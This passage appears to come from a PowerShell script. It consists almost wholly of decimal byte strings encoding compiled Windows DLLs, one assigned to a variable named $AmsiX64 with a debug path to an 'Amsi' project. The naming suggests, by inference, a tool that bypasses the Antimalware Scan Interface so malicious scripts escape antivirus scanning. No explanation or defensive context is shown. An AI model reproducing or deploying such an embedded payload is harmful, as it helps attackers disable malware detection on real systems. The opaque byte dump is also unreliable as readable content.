0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 80 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 12 1 0 0 7 48 108 48 155 48 171 48 194 48 211 48 228 48 233 48 2 49 7 49 20 49 97 49 126 49 136 49 150 49 168 49 189 49 251 49 212 50 7 51 85 51 94 51 105 51 112 51 144 51 150 51 156 51 162 51 168 51 174 51 181 51 188 51 195 51 202 51 209 51 216 51 223 51 231 51 239 51 247 51 3 52 12 52 17 52 23 52 33 52 43 52 59 52 75 52 91 52 100 52 201 52 121 53 170 53 249 53 12 54 31 54 43 54 59 54 76 54 114 54 135 54 142 54 148 54 166 54 176 54 17 55 30 55 69 55 77 55 102 55 160 55 187 55 199 55 214 55 223 55 236 55 27 56 35 56 46 56 52 56 58 56 70 56 76 56 111 56 160 56 75 57 106 57 116 57 133 57 146 57 151 57 189 57 194 57 231 57 241 57 14 58 91 58 96 58 115 58 129 58 156 58 167 58 54 59 63 59 71 59 142 59 157 59 164 59 218 59 227 59 240 59 251 59 4 60 19 60 30 60 36 60 42 60 48 60 54 60 60 60 66 60 72 60 78 60 84 60 90 60 96 60 102 60 108 60 114 60 0 0 0 32 0 0 32 0 0 0 112 48 164 48 168 48 92 49 96 49 104 49 48 52 80 52 108 52 112 52 140 52 144 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + $AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 195 35 0 0 2 116 10 185 7 0 0 0 232 23 8 0 0 232 102 4 0 0 137 29 172 35 0 0 232 139 4 0 0 64 138 207 232 75 6 0 0 51 210 64 138 206 232 101 6 0 0 132 192 15 149 195 139 195 72 139 92 36 48 72 139 116 36 64 72 131 196 32 95 195 204 204 72 139 196 72 137 88 32 76 137 64 24 137 80 16 72 137 72 8 86 87 65 86 72 131 236 64 77 139 240 139 250 72 139 241 141 66 255 131 248 1 119 46 232 217 0 0 0 139 216 137 68 36 48 133 192 15 132 179 0 0 0 77 139 198 139 215 72 139 206 232 182 253 255 255 139 216 137 68 36 48 133 192 15 132 152 0 0 0 131 255 1 117 8 72 139 206 232 55 11 0 0 77 139 198 139 215 72 139 206 232 74 253 255 255 139 216 137 68 36 48 131 255 1 117 52 133 192 117 39 77 139 198 51 210 72 139 206 232 46 253 255 255 77 139 198 51 210 72 139 206 232 101 253 255 255 77 139 198 51 210 72 139 206 232 96 0 0 0 131 255 1 117 4 133 219 116 4 133 255 117 12 72 139 206 232 229 10 0 0 133 255 116 5 131 255 3 117 42 77 139 198 139 215 72 139 206 232 45 253 255 255 139 216 137 68 36 48 133 192 116 19 77 139 198 139 215 72 139 206 232 30 0 0 0 139 216 137 68 36 48 235 6 51 219 137 92 36 48 139 195 72 139 92 36 120 72 131 196 64 65 94 95 94 195 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 72 139 29 233 13 0 0 73 139 248 139 242 72 139 233 72 133 219 117 5 141 67 1 235 18 72 139 203 232 127 8 0 0 76 139 199 139 214 72 139 205 255 211 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 195 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 73 139 248 139 218 72 139 241 131 250 1 117 5 232 99 5 0 0 76 139 199 139 211 72 139 206 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 233 103 254 255 255 204 204 204 64 83 72 131 236 32 72 139 217 51 201 255 21 119 12 0 0 72 139 203 255 21 6 12 0 0 255 21 32 12 0 0 72 139 200 186 9 4 0 192 72 131 196 32 91 72 255 37 76 12 0 0 72 137 76 36 8 72 131 236 56 185 23 0 0 0 232 13 10 0 0 133 192 116 7 185 2 0 0 0 205 41 72 141 13 183 28 0 0 232 170 0 0 0 72 139 68 36 56 72 137 5 158 29 0 0 72 141 68 36 56 72 131 192 8 72 137 5 46 29 0 0 72 139 5 135 29 0 0 72 137 5 248 27 0 0 72 139 68 36 64 72 137 5 252 28 0 0 199 5 210 27 0 0 9 4 0 192 199 5 204 27 0 0 1 0 0 0 199 5 214 27 0 0 1 0 0 0 184 8 0 0 0 72 107 192 0 72 141 13 206 27 0 0 72 199 4 1 2 0 0 0 184 8 0 0 0 72 107 192 0 72 139 13 70 27 0 0 72 137 76 4 32 184 8 0 0 0 72 107 192 1 72 139 13 57 27 0 0 72 137 76 4 32 72 141 13 125 12 0 0 232 0 255 255 255 72 131 196 56 195 204 204 204 64 83 86 87 72 131 236 64 72 139 217 255 21 31 11 0 0 72 139 179 248 0 0 0 51 255 69 51 192 72 141 84 36 96 72 139 206 255 21 253 10 0 0 72 133 192 116 57 72 131 100 36 56 0 72 141 76 36 104 72 139 84 36 96 76 139 200 72 137 76 36 48 76 139 198 72 141 76 36 112 72 137 76 36 40 51 201 72 137 92 36 32 255 21 190 10 0 0 255 199 131 255 2 124 177 72 131 196 64 95 94 91 195 204 204 204 72 131 236 40 232 103 8 0 0 133 192 116 33 101 72 139 4 37 48 0 0 0 72 139 72 8 235 5 72 59 200 116 20 51 192 240 72 15 177 13 64 32 0 0 117 238 50 192 72 131 196 40 195 176 1 235 247 204 204 204 72 131 236 40 232 43 8 0 0 133 192 116 7 232 94 6 0 0 235 5 232 95 8 0 0 176 1 72 131 196 40 195 72 131 236 40 51 201 232 65 1 0 0 132 192 15 149 192 72 131 196 40 195 204 204 204 72 131 236 40 232 99 8 0 0 132 192 117 4 50 192 235 18 232 86 8 0 0 132 192 117 7 232 77 8 0 0 235 236 176 1 72 131 196 40 195 72 131 236 40 232 59 8 0 0 232 54 8 0 0 176 1 72 131 196 40 195 204 204 204 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 73 139 249 73 139 240 139 218 72 139 233 232 152 7 0 0 133 192 117 23 131 251 1 117 18 72 139 207 232 187 5 0 0 76 139 198 51 210 72 139 205 255 215 72 139 84 36 88 139 76 36 80 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 233 153 7 0 0 204 204 204 72 131 236 40 232 79 7 0 0 133 192 116 16 72 141 13 72 31 0 0 72 131 196 40 233 145 7 0 0 232 106 249 255 255 133 192 117 5 232 143 7 0 0 72 131 196 40 195 72 131 236 40 51 201 232 141 7 0 0 72 131 196 40 233 132 7 0 0 64 83 72 131 236 32 15 182 5 59 31 0 0 133 201 187 1 0 0 0 15 68 195 136 5 43 31 0 0 232 46 5 0 0 232 93 7 0 0 132 192 117 4 50 192 235 20 232 80 7 0 0 132 192 117 9 51 201 232 69 7 0 0 235 234 138 195 72 131 196 32 91 195 204 204 204 72 137 92 36 8 85 72 139 236 72 131 236 64 139 217 131 249 1 15 135 166 0 0 0 232 171 6 0 0 133 192 116 43 133 219 117 39 72 141 13 160 30 0 0 232 225 6 0 0 133 192 116 4 50 192 235 122 72 141 13 164 30 0 0 232 205 6 0 0 133 192 15 148 192 235 103 72 139 21 169 24 0 0 73 131 200 255 139 194 185 64 0 0 0 131 224 63 43 200 176 1 73 211 200 76 51 194 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 16 77 240 15 17 5 69 30 0 0 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 17 13 61 30 0 0 242 15 16 77 240 15 17 5 57 30 0 0 242 15 17 13 65 30 0 0 72 139 92 36 80 72 131 196 64 93 195 185 5 0 0 0 232 84 2 0 0 204 204 204 204 72 131 236 24 76 139 193 184 77 90 0 0 102 57 5 29 232 255 255 117 124 72 99 5 80 232 255 255 72 141 21 13 232 255 255 72 141 12 16 129 57 80 69 0 0 117 98 184 11 2 0 0 102 57 65 24 117 87 76 43 194 15 183 65 20 72 141 81 24 72 3 208 15 183 65 6 72 141 12 128 76 141 12 202 72 137 20 36 73 59 209 116 24 139 74 12 76 59 193 114 10 139 66 8 3 193 76 59 192 114 8 72 131 194 40 235 223 51 210 72 133 210 117 4 50 192 235 23 247 66 36 0 0 0 128 116 4 50 192 235 10 176 1 235 6 50 192 235 2 50 192 72 131 196 24 195 64 83 72 131 236 32 138 217 232 83 5 0 0 51 210 133 192 116 11 132 219 117 7 72 135 21 62 29 0 0 72 131 196 32 91 195 64 83 72 131 236 32 128 61 99 29 0 0 0 138 217 116 4 132 210 117 14 138 203 232 144 5 0 0 138 203 232 137 5 0 0 176 1 72 131 196 32 91 195 204 64 83 72 131 236 32 72 139 21 55 23 0 0 72 139 217 139 202 72 51 21 251 28 0 0 131 225 63 72 211 202 72 131 250 255 117 10 72 139 203 232 63 5 0 0 235 15 72 139 211 72 141 13 219 28 0 0 232 34 5 0 0 51 201 133 192 72 15 68 203 72 139 193 72 131 196 32 91 195 204 72 131 236 40 232 167 255 255 255 72 247 216 27 192 247 216 255 200 72 131 196 40 195 204 72 137 92 36 32 85 72 139 236 72 131 236 32 72 131 101 24 0 72 187 50 162 223 45 153 43 0 0 72 139 5 185 22 0 0 72 59 195 117 111 72 141 77 24 255 21 226 6 0 0 72 139 69 24 72 137 69 16 255 21 220 6 0 0 139 192 72 49 69 16 255 21 216 6 0 0 139 192 72 141 77 32 72 49 69 16 255 21 208 6 0 0 139 69 32 72 141 77 16 72 193 224 32 72 51 69 32 72 51 69 16 72 51 193 72 185 255 255 255 255 255 255 0 0 72 35 193 72 185 51 162 223 45 153 43 0 0 72 59 195 72 15 68 193 72 137 5 69 22 0 0 72 139 92 36 72 72 247 208 72 137 5 62 22 0 0 72 131 196 32 93 195 72 141 13 57 28 0 0 72 255 37 82 6 0 0 204 204 72 141 13 41 28 0 0 233 6 4 0 0 72 141 5 45 28 0 0 195 72 141 5 45 28 0 0 195 72 131 236 40 232 231 255 255 255 72 131 8 4 232 230 255 255 255 72 131 8 2 72 131 196 40 195 204 72 141 5 25 28 0 0 195 72 137 92 36 8 85 72 141 172 36 64 251 255 255 72 129 236 192 5 0 0 139 217 185 23 0 0 0 232 243 3 0 0 133 192 116 4 139 203 205 41 131 37 224 27 0 0 0 72 141 77 240 51 210 65 184 208 4 0 0 232 151 3 0 0 72 141 77 240 255 21 173 5 0 0 72 139 157 232 0 0 0 72 141 149 216 4 0 0 72 139 203 69 51 192 255 21 139 5 0 0 72 133 192 116 60 72 131 100 36 56 0 72 141 141 224 4 0 0 72 139 149 216 4 0 0 76 139 200 72 137 76 36 48 76 139 195 72 141 141 232 4 0 0 72 137 76 36 40 72 141 77 240 72 137 76 36 32 51 201 255 21 66 5 0 0 72 139 133 200 4 0 0 72 141 76 36 80 72 137 133 232 0 0 0 51 210 72 141 133 200 4 0 0 65 184 152 0 0 0 72 131 192 8 72 137 133 136 0 0 0 232 0 3 0 0 72 139 133 200 4 0 0 72 137 68 36 96 199 68 36 80 21 0 0 64 199 68 36 84 1 0 0 0 255 21 14 5 0 0 131 248 1 72 141 68 36 80 72 137 68 36 64 72 141 69 240 15 148 195 72 137 68 36 72 51 201 255 21 45 5 0 0 72 141 76 36 64 255 21 186 4 0 0 133 192 117 10 246 219 27 192 33 5 220 26 0 0 72 139 156 36 208 5 0 0 72 129 196 192 5 0 0 93 195 204 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 154 9 0 0 72 141 53 147 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 105 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 94 9 0 0 72 141 53 87 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 29 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 255 37 241 4 0 0 204 72 137 92 36 16 85 72 139 236 72 131 236 32 131 101 232 0 51 201 51 192 199 5 245 19 0 0 2 0 0 0 15 162 68 139 193 199 5 226 19 0 0 1 0 0 0 65 129 240 110 116 101 108 68 139 202 65 129 241 105 110 101 73 68 139 210 69 11 200 139 211 129 242 71 101 110 117 68 139 216 68 11 202 184 1 0 0 0 65 15 148 192 129 241 99 65 77 68 129 243 65 117 116 104 65 129 242 101 110 116 105 65 11 218 11 217 65 15 148 194 51 201 15 162 68 139 201 137 69 240 69 132 192 68 137 77 248 68 139 5 156 25 0 0 139 200 137 93 244 137 85 252 116 82 72 131 13 118 19 0 0 255 65 131 200 4 37 240 63 255 15 68 137 5 122 25 0 0 61 192 6 1 0 116 40 61 96 6 2 0 116 33 61 112 6 2 0 116 26 5 176 249 252 255 131 248 32 119 27 72 187 1 0 1 0 1 0 0 0 72 15 163 195 115 11 65 131 200 1 68 137 5 64 25 0 0 69 132 210 116 25 129 225 0 15 240 15 129 249 0 15 96 0 124 11 65 131 200 4 68 137 5 34 25 0 0 184 7 0 0 0 137 85 224 68 137 77 228 68 59 216 124 36 51 201 15 162 137 69 240 137 93 244 137 77 248 137 85 252 137 93 232 15 186 227 9 115 11 65 131 200 2 68 137 5 237 24 0 0 65 15 186 225 20 115 110 199 5 192 18 0 0 2 0 0 0 199 5 186 18 0 0 6 0 0 0 65 15 186 225 27 115 83 65 15 186 225 28 115 76 51 201 15 1 208 72 193 226 32 72 11 208 72 137 85 16 72 139 69 16 36 6 60 6 117 50 139 5 140 18 0 0 131 200 8 199 5 123 18 0 0 3 0 0 0 246 69 232 32 137 5 117 18 0 0 116 19 131 200 32 199 5 98 18 0 0 5 0 0 0 137 5 96 18 0 0 51 192 72 139 92 36 56 72 131 196 32 93 195 204 204 204 51 192 57 5 92 18 0 0 15 149 192 195 194 0 0 204 204 204 204 204 255 37 178 2 0 0 255 37 164 2 0 0 255 37 150 2 0 0 255 37 136 2 0 0 255 37 122 2 0 0 255 37 228 2 0 0 255 37 214 2 0 0 255 37 200 2 0 0 255 37 186 2 0 0 255 37 172 2 0 0 255 37 158 2 0 0 255 37 144 2 0 0 255 37 130 2 0 0 255 37 116 2 0 0 255 37 30 2 0 0 204 204 176 1 195 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 255 224 64 85 72 131 236 32 72 139 234 138 77 64 72 131 196 32 93 233 4 250 255 255 204 64 85 72 131 236 32 72 139 234 232 45 248 255 255 138 77 56 72 131 196 32 93 233 232 249 255 255 204 64 85 72 131 236 48 72 139 234 72 139 1 139 16 72 137 76 36 40 137 84 36 32 76 141 13 161 241 255 255 76 139 69 112 139 85 104 72 139 77 96 232 93 247 255 255 144 72 131 196 48 93 195 204 64 85 72 139 234 72 139 1 51 201 129 56 5 0 0 192 15 148 193 139 193 93 195 204 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 216 29 0 128 1 0 0 0 80 30 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 48 0 128 1 0 0 0 240 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 136 29 62 87 0 0 0 0 2 0 0 0 65 0 0 0 116 34 0 0 116 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 184 34 0 0 184 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 13 0 0 0 68 2 0 0 204 34 0 0 204 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 32 0 128 1 0 0 0 0 33 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 82 83 68 83 42 80 223 113 29 247 64 69 188 37 18 40 145 144 25 190 50 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 120 54 52 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 18 0 0 0 18 0 0 0 1 0 0 0 17 0 0 0 71 67 84 76 0 16 0 0 63 14 0 0 46 116 101 120 116 36 109 110 0 0 0 0 64 30 0 0 18 0 0 0 46 116 101 120 116 36 109 110 36 48 48 0 82 30 0 0 129 0 0 0 46 116 101 120 116 36 120 0 0 32 0 0 248 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 248 32 0 0 16 0 0 0 46 48 48 99 102 103 0 0 8 33 0 0 8 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 16 33 0 0 8 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 24 33 0 0 8 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 32 33 0 0 8 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 40 33 0 0 8 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 48 33 0 0 8 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 56 33 0 0 8 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 64 33 0 0 8 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 80 33 0 0 36 1 0 0 46 114 100 97 116 97 0 0 116 34 0 0 156 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 16 37 0 0 8 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 24 37 0 0 8 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 32 37 0 0 8 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 40 37 0 0 8 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 48 37 0 0 60 1 0 0 46 120 100 97 116 97 0 0 108 38 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 168 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 192 38 0 0 248 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 184 39 0 0 200 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 52 0 0 0 46 100 97 116 97 0 0 0 64 48 0 0 0 